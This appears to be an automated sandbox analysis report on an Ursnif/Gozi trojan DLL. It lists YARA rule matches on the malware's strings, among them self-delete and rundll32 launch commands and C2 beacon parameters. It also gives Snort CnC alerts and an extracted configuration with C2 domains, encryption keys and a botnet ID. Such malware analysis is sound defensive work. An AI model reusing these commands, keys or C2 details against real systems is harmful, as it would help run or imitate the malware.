00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: loaddll32.exe PID: 4124	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 4124	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x631:$a5: filename="%.4u.%lu" 0x92f:$a5: filename="%.4u.%lu" 0x5f74:$a5: filename="%.4u.%lu" 0x6272:$a5: filename="%.4u.%lu" 0xf9:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5a3c:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x26:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x3e7:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x6ea:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x5969:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x5d2a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x602d:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa53e:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa563:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa6ef:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xab5:$a9: &whoami=%s 0x63f8:$a9: &whoami=%s 0xa9d:$a10: %u.%u_%u_%u_x%u 0x63e0:$a10: %u.%u_%u_%u_x%u 0x5ab:$a11: size=%u&hash=0x%08x 0x5eee:$a11: size=%u&hash=0x%08x
Process Memory Space: loaddll32.exe PID: 4124	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x560:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x861:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x5ea3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x61a4:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xf9:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x2a5:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5a3c:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5be8:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5fd:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x8fb:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x5f40:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x623e:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x491:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x795:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x5dd4:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x60d8:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x6c1:$a9: Software\AppDataLow\Software\Microsoft\ 0x9c6:$a9: Software\AppDataLow\Software\Microsoft\ 0x152c:$a9: Software\AppDataLow\Software\Microsoft\ 0x157a:$a9: Software\AppDataLow\Software\Microsoft\ 0x6004:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: regsvr32.exe PID: 5216	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 5216	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x13f5:$a5: filename="%.4u.%lu" 0x16f3:$a5: filename="%.4u.%lu" 0x15e35:$a5: filename="%.4u.%lu" 0x16133:$a5: filename="%.4u.%lu" 0xebd:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x158fd:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xdea:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x11ab:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x14ae:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x9d13:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x9d38:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x9ec4:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x1582a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x15beb:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x15eee:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x1879:$a9: &whoami=%s 0x162b9:$a9: &whoami=%s 0x1861:$a10: %u.%u_%u_%u_x%u 0x162a1:$a10: %u.%u_%u_%u_x%u 0x136f:$a11: size=%u&hash=0x%08x 0x15daf:$a11: size=%u&hash=0x%08x
Process Memory Space: regsvr32.exe PID: 5216	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x1324:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x1625:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x15d64:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x16065:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xebd:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x1069:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x158fd:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x15aa9:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x13c1:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x16bf:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x15e01:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x160ff:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x1255:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x1559:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x15c95:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x15f99:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x1485:$a9: Software\AppDataLow\Software\Microsoft\ 0x178a:$a9: Software\AppDataLow\Software\Microsoft\ 0x2416:$a9: Software\AppDataLow\Software\Microsoft\ 0x2463:$a9: Software\AppDataLow\Software\Microsoft\ 0x15ec5:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: rundll32.exe PID: 5020	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 5020	Windows_Trojan_Gozi_fd494041	unknown	unknown	0x80d:$a5: filename="%.4u.%lu" 0xb0b:$a5: filename="%.4u.%lu" 0x16f26:$a5: filename="%.4u.%lu" 0x17224:$a5: filename="%.4u.%lu" 0x2d5:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x169ee:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x202:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x5c3:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x8c6:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xf309:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xf32e:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xf4ba:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x1691b:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x16cdc:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x16fdf:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xc91:$a9: &whoami=%s 0x173aa:$a9: &whoami=%s 0xc79:$a10: %u.%u_%u_%u_x%u 0x17392:$a10: %u.%u_%u_%u_x%u 0x787:$a11: size=%u&hash=0x%08x 0x16ea0:$a11: size=%u&hash=0x%08x
Process Memory Space: rundll32.exe PID: 5020	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0x73c:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xa3d:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x16e55:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x17156:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x2d5:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x481:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x169ee:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x16b9a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x7d9:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xad7:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x16ef2:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x171f0:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0x66d:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x971:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x16d86:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x1708a:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0x89d:$a9: Software\AppDataLow\Software\Microsoft\ 0xba2:$a9: Software\AppDataLow\Software\Microsoft\ 0x1893:$a9: Software\AppDataLow\Software\Microsoft\ 0x18e1:$a9: Software\AppDataLow\Software\Microsoft\ 0x16fb6:$a9: Software\AppDataLow\Software\Microsoft\
Process Memory Space: rundll32.exe PID: 780	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 780	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xbce:$a5: filename="%.4u.%lu" 0xecc:$a5: filename="%.4u.%lu" 0xa210:$a5: filename="%.4u.%lu" 0xa50e:$a5: filename="%.4u.%lu" 0x696:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x9cd8:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x5c3:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x984:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xc87:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x7b91:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x7bb6:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x7d42:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x9c05:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x9fc6:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa2c9:$a8: %08X-%04X-%04X-%04X-%08X%04X 0x1052:$a9: &whoami=%s 0xa694:$a9: &whoami=%s 0x103a:$a10: %u.%u_%u_%u_x%u 0xa67c:$a10: %u.%u_%u_%u_x%u 0xb48:$a11: size=%u&hash=0x%08x 0xa18a:$a11: size=%u&hash=0x%08x
Process Memory Space: rundll32.exe PID: 780	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xafd:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xdfe:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xa13f:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0xa440:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x696:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x842:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x9cd8:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x9e84:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xb9a:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xe98:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xa1dc:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xa4da:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xa2e:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd32:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xa070:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xa374:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xc5e:$a9: Software\AppDataLow\Software\Microsoft\ 0xf63:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c2d:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c7a:$a9: Software\AppDataLow\Software\Microsoft\ 0xa2a0:$a9: Software\AppDataLow\Software\Microsoft\
Click to see the 119 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.13794a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.regsvr32.exe.10000000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.regsvr32.exe.4a494a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.49b94a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.4b094a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.2e30000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.7f0000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.45e0000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.10000000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.regsvr32.exe.2af0000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 7 entries

Snort Signatures

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649715802033204 10/21/22-00:25:18.871319
SID:	2033204
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649747802033204 10/21/22-00:27:40.718067
SID:	2033204
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649718802033204 10/21/22-00:25:20.730105
SID:	2033204
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649747802033203 10/21/22-00:27:40.718067
SID:	2033203
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 62.173.145.183

Timestamp:	192.168.2.462.173.145.18349742802033203 10/21/22-00:27:12.300672
SID:	2033203
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 62.173.145.183

Timestamp:	192.168.2.462.173.145.18349742802033204 10/21/22-00:27:12.300672
SID:	2033204
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649711802033203 10/21/22-00:25:09.002887
SID:	2033203
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.859444532023883 10/21/22-00:25:29.478642
SID:	2023883
Source Port:	59444
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649711802033204 10/21/22-00:25:09.002887
SID:	2033204
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.858914532023883 10/21/22-00:27:11.884556
SID:	2023883
Source Port:	58914
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649719802033203 10/21/22-00:25:23.881073
SID:	2033203
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 62.173.145.183

Timestamp:	192.168.2.462.173.145.18349743802033203 10/21/22-00:27:20.607846
SID:	2033203
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 62.173.145.183

Timestamp:	192.168.2.462.173.145.18349743802033204 10/21/22-00:27:20.607846
SID:	2033204
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 62.173.145.183

Timestamp:	192.168.2.462.173.145.18349744802033204 10/21/22-00:27:22.814108
SID:	2033204
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649748802033203 10/21/22-00:27:42.910400
SID:	2033203
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649746802033204 10/21/22-00:27:32.445316
SID:	2033204
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 13.107.42.16

Timestamp:	192.168.2.413.107.42.1649748802033204 10/21/22-00:27:42.910400
SID:	2033204
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) - Source IP: 192.168.2.4 - Destination IP: 62.173.145.183

Timestamp:	192.168.2.462.173.145.18349744802033203 10/21/22-00:27:22.814108
SID:	2033203
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) - Source IP: 192.168.2.4 - Destination IP: 62.173.145.183

Timestamp:	192.168.2.462.173.145.18349745802033204 10/21/22-00:27:25.963477
SID:	2033204
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ursnif_IAT_corrected.exe.dll

Virustotal: Detection: 55%

Perma Link

Antivirus / Scanner detection for submitted sample

Source: ursnif_IAT_corrected.exe.dll

Avira: detected

Multi AV Scanner detection for domain / URL

Source: linetwork.top	Virustotal: Detection: 12%	Perma Link
Source: onlinetwork.top	Virustotal: Detection: 12%	Perma Link
Source: http://onlinetwork.top/	Virustotal: Detection: 12%	Perma Link

Machine Learning detection for sample

Source: ursnif_IAT_corrected.exe.dll

Joe Sandbox ML: detected

Source: ursnif_IAT_corrected.exe.dll

Malware Configuration Extractor: Ursnif {"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_02AF47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	3_2_02AF47E5
